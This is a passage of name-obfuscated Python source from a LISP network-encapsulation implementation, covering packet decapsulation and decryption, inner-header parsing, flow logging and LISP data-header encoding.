elif ( self . outer_version == 6 ) :
O0ooo0 = LISP_AFI_IPV6
OoO00oo00 = 8
o0Oo00o0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( o0Oo00o0 ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
O0oo0ooO00 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
lprint ( "Cannot decode outer header" )
return ( None )
if 42 - 42: I1Ii111 / OoOoOO00 % oO0o
if 63 - 63: OoO0O00 % i1IIi - oO0o
self . outer_source . afi = O0ooo0
self . outer_dest . afi = O0ooo0
Iii1i11 = self . outer_source . addr_length ( )
if 40 - 40: I1ii11iIi11i / iIii1I11I1II1 . IiII % ooOoO0o
self . outer_source . unpack_address ( IiiiIi1iiii11 [ OoO00oo00 : OoO00oo00 + Iii1i11 ] )
OoO00oo00 += Iii1i11
self . outer_dest . unpack_address ( IiiiIi1iiii11 [ OoO00oo00 : OoO00oo00 + Iii1i11 ] )
IiiiIi1iiii11 = IiiiIi1iiii11 [ O0oo0ooO00 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 56 - 56: ooOoO0o . iIii1I11I1II1 + i1IIi
if 84 - 84: iII111i % i1IIi
if 62 - 62: I1ii11iIi11i . I1Ii111 . Ii1I
if 19 - 19: I1ii11iIi11i / I1Ii111
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( IIiIIiiiiiII1 )
IIiIIiiiiiII1 = struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( IIiIIiiiiiII1 )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
if 7 - 7: I1ii11iIi11i - iIii1I11I1II1
if 97 - 97: OOooOOo
if 41 - 41: OoooooooOO - Oo0Ooo * iIii1I11I1II1 . i1IIi
if 39 - 39: Ii1I % i1IIi . I1ii11iIi11i - O0
IiiI1Ii1II = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
OO0oIii1I1I = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 65 - 65: oO0o * oO0o / I11i + oO0o % ooOoO0o + OoOoOO00
if 92 - 92: o0oOOo0O0Ooo
if 37 - 37: oO0o
if 18 - 18: IiII * i11iIiiIii + iIii1I11I1II1 % I11i + i1IIi - OoO0O00
if ( self . lisp_header . decode ( IiiiIi1iiii11 ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if 85 - 85: OoO0O00 * I11i + OoO0O00
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 39 - 39: Oo0Ooo / i1IIi % i1IIi
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
o0OoO0000o = self . lisp_header . get_instance_id ( )
O0oo0ooO00 += 16
if 20 - 20: OOooOOo * oO0o
if ( o0OoO0000o == 0xffffff ) : o0OoO0000o = 0
if 91 - 91: OoO0O00 % i1IIi - iIii1I11I1II1 . OOooOOo
if 31 - 31: oO0o % i1IIi . OoooooooOO - o0oOOo0O0Ooo + OoooooooOO
if 45 - 45: OOooOOo + I11i / OoooooooOO - Ii1I + OoooooooOO
if 42 - 42: iIii1I11I1II1 * I1IiiI * I1Ii111
O00oo0o0o0oo = False
I1I1I1 = self . lisp_header . k_bits
if ( I1I1I1 ) :
oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oo0o00OO == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if 29 - 29: I1ii11iIi11i
self . print_packet ( "Receive" , is_lisp_packet )
oOOoOO = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( oOOoOO , I1I1I1 ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 99 - 99: ooOoO0o * iIii1I11I1II1 - Ii1I + Oo0Ooo . Oo0Ooo
if 18 - 18: OOooOOo
Oo000O000 = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ I1I1I1 ]
if ( Oo000O000 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if 7 - 7: I1IiiI
self . print_packet ( "Receive" , is_lisp_packet )
oOOoOO = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( oOOoOO ,
red ( oo0o00OO , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 40 - 40: ooOoO0o
if 80 - 80: I1IiiI * I1Ii111 % oO0o . i11iIiiIii % IiII
if 42 - 42: OoooooooOO * II111iiii
if 53 - 53: I1Ii111 + i1IIi . OoO0O00 / i11iIiiIii + Ii1I % OoOoOO00
if 9 - 9: ooOoO0o . I11i - Oo0Ooo . I1Ii111
Oo000O000 . use_count += 1
IiiiIi1iiii11 , O00oo0o0o0oo = self . decrypt ( IiiiIi1iiii11 , O0oo0ooO00 , Oo000O000 ,
oo0o00OO )
if ( O00oo0o0o0oo == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 39 - 39: OOooOOo
if 70 - 70: IiII % OoO0O00 % I1IiiI
if 95 - 95: OoOoOO00 - I1Ii111 / O0 * I1IiiI - o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 % Oo0Ooo . iII111i . IiII % i11iIiiIii
if 2 - 2: oO0o * oO0o . OoOoOO00 * Ii1I * iIii1I11I1II1
if 13 - 13: I11i / O0 . i11iIiiIii * i1IIi % i11iIiiIii
oOoO0 = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . inner_version = oOoO0 >> 4
if ( IiiI1Ii1II and self . inner_version == 4 and oOoO0 >= 0x45 ) :
iIi1Iii1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 12 : 16 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 16 : 20 ] )
iiIII1i1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( iiIII1i1 & 0x2000 or iiIII1i1 != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 87 - 87: OoooooooOO
elif ( IiiI1Ii1II and self . inner_version == 6 and oOoO0 >= 0x60 ) :
iIi1Iii1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ] ) + 40
o0Oo00o0 = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( o0Oo00o0 ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 8 : 24 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 1 - 1: iIii1I11I1II1 / o0oOOo0O0Ooo
elif ( OO0oIii1I1I ) :
iIi1Iii1 = len ( IiiiIi1iiii11 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( oO0oO00 )
if 98 - 98: O0 % I1IiiI / OoooooooOO * I1ii11iIi11i - oO0o
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( oOoO0 ) ) )
if 51 - 51: iII111i + I11i
IiiiIi1iiii11 = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( IiiiIi1iiii11 ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 54 - 54: II111iiii * O0 % I1IiiI . I11i
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = o0OoO0000o
self . inner_dest . instance_id = o0OoO0000o
if 62 - 62: Ii1I . i11iIiiIii % O0 % I1Ii111 - Oo0Ooo
if 69 - 69: II111iiii . OoOoOO00 * OoOoOO00 % Ii1I + I1IiiI
if 100 - 100: i11iIiiIii - Oo0Ooo
if 47 - 47: iII111i * OoOoOO00 * IiII
if 46 - 46: Ii1I
if ( lisp_nonce_echoing and is_lisp_packet ) :
ii1 = lisp_get_echo_nonce ( self . outer_source , None )
if ( ii1 == None ) :
o0oooOoOoOo = self . outer_source . print_address_no_iid ( )
ii1 = lisp_echo_nonce ( o0oooOoOoOo )
if 96 - 96: OoOoOO00 / OoO0O00 % OoooooooOO * ooOoO0o
Iii11I = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
ii1 . receive_request ( lisp_ipc_socket , Iii11I )
elif ( ii1 . request_nonce_sent ) :
ii1 . receive_echo ( lisp_ipc_socket , Iii11I )
if 2 - 2: oO0o . OOooOOo
if 43 - 43: iIii1I11I1II1
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
if 98 - 98: i1IIi - iII111i
if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
if 9 - 9: IiII - II111iiii * OoO0O00
if ( O00oo0o0o0oo ) : self . packet += IiiiIi1iiii11 [ : iIi1Iii1 ]
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1
if 28 - 28: OoOoOO00 % OoooooooOO
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI
if 84 - 84: II111iiii
def strip_outer_headers ( self ) :
OoO00oo00 = 16
OoO00oo00 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ OoO00oo00 : : ]
return ( self )
if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
def hash_ports ( self ) :
IiiiIi1iiii11 = self . packet
oOoO0 = self . inner_version
IIi1iiIIi1i = 0
if ( oOoO0 == 4 ) :
ii1I = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( ii1I )
if ( ii1I in [ 6 , 17 ] ) :
IIi1iiIIi1i = ii1I
IIi1iiIIi1i += struct . unpack ( "I" , IiiiIi1iiii11 [ 20 : 24 ] ) [ 0 ]
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
if 33 - 33: i11iIiiIii % OoOoOO00 % OOooOOo % i11iIiiIii - I1ii11iIi11i
if 21 - 21: I11i . Oo0Ooo - OoooooooOO * i1IIi
if ( oOoO0 == 6 ) :
ii1I = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 ] ) [ 0 ]
if ( ii1I in [ 6 , 17 ] ) :
IIi1iiIIi1i = ii1I
IIi1iiIIi1i += struct . unpack ( "I" , IiiiIi1iiii11 [ 40 : 44 ] ) [ 0 ]
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
if 54 - 54: II111iiii % o0oOOo0O0Ooo - i1IIi . I1IiiI - II111iiii / iIii1I11I1II1
if 29 - 29: oO0o
return ( IIi1iiIIi1i )
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
def hash_packet ( self ) :
IIi1iiIIi1i = self . inner_source . address ^ self . inner_dest . address
IIi1iiIIi1i += self . hash_ports ( )
if ( self . inner_version == 4 ) :
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
elif ( self . inner_version == 6 ) :
IIi1iiIIi1i = ( IIi1iiIIi1i >> 64 ) ^ ( IIi1iiIIi1i & 0xffffffffffffffff )
IIi1iiIIi1i = ( IIi1iiIIi1i >> 32 ) ^ ( IIi1iiIIi1i & 0xffffffff )
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
self . udp_sport = 0xf000 | ( IIi1iiIIi1i & 0xfff )
if 46 - 46: I1Ii111 % I1ii11iIi11i + Ii1I
if 67 - 67: iIii1I11I1II1 . i11iIiiIii . i11iIiiIii . i11iIiiIii / I11i + ooOoO0o
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
i11IiIiii = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# OoOoOO00
green ( i11IiIiii , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 94 - 94: iIii1I11I1II1 * ooOoO0o - IiII % OoooooooOO * I11i . OoOoOO00
if 89 - 89: i11iIiiIii / O0 - i1IIi % Oo0Ooo + i11iIiiIii
if ( s_or_r . find ( "Receive" ) != - 1 ) :
ii1IO0oo00o000 = "decap"
ii1IO0oo00o000 += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
ii1IO0oo00o000 = s_or_r
if ( ii1IO0oo00o000 in [ "Send" , "Replicate" ] or ii1IO0oo00o000 . find ( "Fragment" ) != - 1 ) :
ii1IO0oo00o000 = "encap"
if 5 - 5: I1ii11iIi11i * Ii1I % I11i % II111iiii
if 9 - 9: o0oOOo0O0Ooo % I1Ii111 + I11i
oOOO00o00 = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 68 - 68: O0 * iIii1I11I1II1 / I1Ii111
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
if 99 - 99: I1IiiI
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
if 55 - 55: II111iiii - I1Ii111 - OOooOOo % Ii1I
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 49 - 49: Oo0Ooo * I1Ii111
oOOo0ooO0 += bold ( "control-packet" , False ) + ": {} ..."
if 53 - 53: Oo0Ooo / Ii1I + oO0o . iII111i + IiII
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( oOOO00o00 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 19 - 19: Ii1I
if 51 - 51: iIii1I11I1II1
if 8 - 8: OoO0O00 / o0oOOo0O0Ooo % iII111i . i11iIiiIii . OoooooooOO . Ii1I
if 8 - 8: OoO0O00 * Oo0Ooo
if ( self . lisp_header . k_bits ) :
if ( ii1IO0oo00o000 == "encap" ) : ii1IO0oo00o000 = "encrypt/encap"
if ( ii1IO0oo00o000 == "decap" ) : ii1IO0oo00o000 = "decap/decrypt"
if 41 - 41: Oo0Ooo / OoO0O00 / OoOoOO00 - i11iIiiIii - OoOoOO00
if 4 - 4: I11i . IiII
i11IiIiii = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 39 - 39: OOooOOo . Oo0Ooo - OoOoOO00 * i11iIiiIii
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( oOOO00o00 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( i11IiIiii , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( ii1IO0oo00o000 ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 4 - 4: OoOoOO00 * O0 - I11i
if 72 - 72: I11i + ooOoO0o / I1IiiI . IiII % OoO0O00 / i11iIiiIii
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 13 - 13: I1Ii111 % o0oOOo0O0Ooo + OOooOOo + I1Ii111 + i11iIiiIii - I1ii11iIi11i
if 70 - 70: II111iiii * II111iiii . I1IiiI
def get_raw_socket ( self ) :
o0OoO0000o = str ( self . lisp_header . get_instance_id ( ) )
if ( o0OoO0000o == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( o0OoO0000o ) == False ) : return ( None )
if 11 - 11: iII111i
II1i = lisp_iid_to_interface [ o0OoO0000o ]
IiII1iiI = II1i . get_socket ( )
if ( IiII1iiI == None ) :
Iii11I111Ii11 = bold ( "SO_BINDTODEVICE" , False )
i1OooO00oO00o = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( Iii11I111Ii11 , "drop" if i1OooO00oO00o else "forward" ) )
if 14 - 14: I1ii11iIi11i * Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
if ( i1OooO00oO00o ) : return ( None )
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
o0OoO0000o = bold ( o0OoO0000o , False )
OooOOOoOoo0O0 = bold ( II1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( o0OoO0000o , OooOOOoOoo0O0 ) )
return ( IiII1iiI )
if 17 - 17: OoO0O00 - Oo0Ooo * O0 / Ii1I
if 19 - 19: i1IIi - iIii1I11I1II1 . I11i
def log_flow ( self , encap ) :
global lisp_flow_log
if 2 - 2: Ii1I
Ii1i111iI = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or Ii1i111iI ) :
iII1ii = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = iII1ii ) . start ( )
if ( Ii1i111iI ) : os . system ( "rm ./log-flows" )
return
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
if 7 - 7: IiII
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
III11i = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 54 - 54: I1Ii111 / o0oOOo0O0Ooo
I11IIIIiII = red ( self . outer_source . print_address_no_iid ( ) , False )
OoooO = red ( self . outer_dest . print_address_no_iid ( ) , False )
IIIi1IIiII11 = green ( self . inner_source . print_address ( ) , False )
I1IIi = green ( self . inner_dest . print_address ( ) , False )
if 80 - 80: I11i / oO0o * Ii1I / iII111i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
III11i += " {}:{} -> {}:{}, LISP control message type {}\n"
III11i = III11i . format ( I11IIIIiII , self . udp_sport , OoooO , self . udp_dport ,
self . inner_version )
return ( III11i )
if 19 - 19: i1IIi + II111iiii + o0oOOo0O0Ooo - iIii1I11I1II1
if 61 - 61: iII111i * ooOoO0o
if ( self . outer_dest . is_null ( ) == False ) :
III11i += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
III11i = III11i . format ( I11IIIIiII , self . udp_sport , OoooO , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 1 - 1: I1Ii111 * OoOoOO00
if 100 - 100: I1ii11iIi11i / O0 / ooOoO0o + I1ii11iIi11i
if 48 - 48: OoooooooOO . iII111i + O0
if 85 - 85: II111iiii - Ii1I
if 93 - 93: IiII / i11iIiiIii - oO0o + OoO0O00 / i1IIi
if ( self . lisp_header . k_bits != 0 ) :
OO0oO = "\n"
if ( self . packet_error != "" ) :
OO0oO = " ({})" . format ( self . packet_error ) + OO0oO
if 32 - 32: iII111i % i1IIi
III11i += ", encrypted" + OO0oO
return ( III11i )
if 62 - 62: I11i . II111iiii * O0 + i1IIi * OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
if 74 - 74: Oo0Ooo - II111iiii - IiII
if 50 - 50: I1IiiI - oO0o + oO0o * I11i + oO0o
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 70 - 70: i1IIi % OoO0O00 / i1IIi
if 30 - 30: OoOoOO00 - i11iIiiIii
ii1I = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
ii1I = struct . unpack ( "B" , ii1I ) [ 0 ]
if 94 - 94: OoOoOO00 % iII111i
III11i += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
III11i = III11i . format ( IIIi1IIiII11 , I1IIi , len ( packet ) , self . inner_tos ,
self . inner_ttl , ii1I )
if 39 - 39: OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if ( ii1I in [ 6 , 17 ] ) :
ii1iiIiiiI11 = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( ii1iiIiiiI11 ) == 4 ) :
ii1iiIiiiI11 = socket . ntohl ( struct . unpack ( "I" , ii1iiIiiiI11 ) [ 0 ] )
III11i += ", ports {} -> {}" . format ( ii1iiIiiiI11 >> 16 , ii1iiIiiiI11 & 0xffff )
if 95 - 95: I1Ii111 - IiII
elif ( ii1I == 1 ) :
I1ii = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( I1ii ) == 2 ) :
I1ii = socket . ntohs ( struct . unpack ( "H" , I1ii ) [ 0 ] )
III11i += ", icmp-seq {}" . format ( I1ii )
if 82 - 82: OoOoOO00 . Ii1I
if 73 - 73: I1Ii111
if ( self . packet_error != "" ) :
III11i += " ({})" . format ( self . packet_error )
if 25 - 25: IiII
III11i += "\n"
return ( III11i )
if 77 - 77: o0oOOo0O0Ooo . iIii1I11I1II1 . OoooooooOO . iIii1I11I1II1
if 87 - 87: II111iiii - OoooooooOO / i1IIi . Ii1I - Oo0Ooo . i11iIiiIii
def is_trace ( self ) :
ii1iiIiiiI11 = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ii1iiIiiiI11 )
if 47 - 47: Oo0Ooo % OoO0O00 - ooOoO0o - Oo0Ooo * oO0o
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
if 30 - 30: Oo0Ooo + I1IiiI + i11iIiiIii / OoO0O00
if 64 - 64: IiII
if 80 - 80: I1IiiI - i11iIiiIii / OoO0O00 / OoOoOO00 + OoOoOO00
if 89 - 89: O0 + IiII * I1Ii111
if 30 - 30: OoOoOO00
if 39 - 39: I1ii11iIi11i + o0oOOo0O0Ooo + I1Ii111 + IiII
if 48 - 48: I1Ii111 / ooOoO0o . iIii1I11I1II1
if 72 - 72: i1IIi . o0oOOo0O0Ooo
if 3 - 3: OoOoOO00 % II111iiii - O0
if 52 - 52: OoO0O00
if 49 - 49: Ii1I . I1ii11iIi11i % ooOoO0o . Oo0Ooo * OOooOOo
if 44 - 44: iIii1I11I1II1 / O0 * Oo0Ooo + I1IiiI . ooOoO0o
if 20 - 20: iII111i + o0oOOo0O0Ooo . I1Ii111 / i11iIiiIii
if 7 - 7: OoOoOO00 / OoOoOO00 . I1Ii111 * O0 + IiII + oO0o
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 98 - 98: II111iiii * IiII - I1IiiI % o0oOOo0O0Ooo - iII111i % I1ii11iIi11i
class lisp_data_header ( ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 69 - 69: i1IIi % OoO0O00 % I1Ii111 / ooOoO0o / ooOoO0o
if 6 - 6: II111iiii % I1ii11iIi11i % i1IIi * ooOoO0o
def print_header ( self , e_or_d ) :
iII = lisp_hex_string ( self . first_long & 0xffffff )
oooO0 = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 7 - 7: OoO0O00 * iII111i
oOOo0ooO0 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 16 - 16: I1Ii111 . i1IIi . IiII
return ( oOOo0ooO0 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
iII , oooO0 ) )
if 50 - 50: OoO0O00 - II111iiii * OoooooooOO - I1IiiI . O0 + O0
if 80 - 80: o0oOOo0O0Ooo
def encode ( self ) :
i1I1iii1I11II = "II"
iII = socket . htonl ( self . first_long )
oooO0 = socket . htonl ( self . second_long )
if 5 - 5: i11iIiiIii / ooOoO0o - iII111i - OoooooooOO / ooOoO0o + iIii1I11I1II1
O0ooOoO0 = struct . pack ( i1I1iii1I11II , iII , oooO0 )
return ( O0ooOoO0 )
if 10 - 10: i11iIiiIii % OOooOOo * iII111i % Oo0Ooo
if 51 - 51: OoO0O00 % iII111i
def decode ( self , packet ) :
i1I1iii1I11II = "II"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
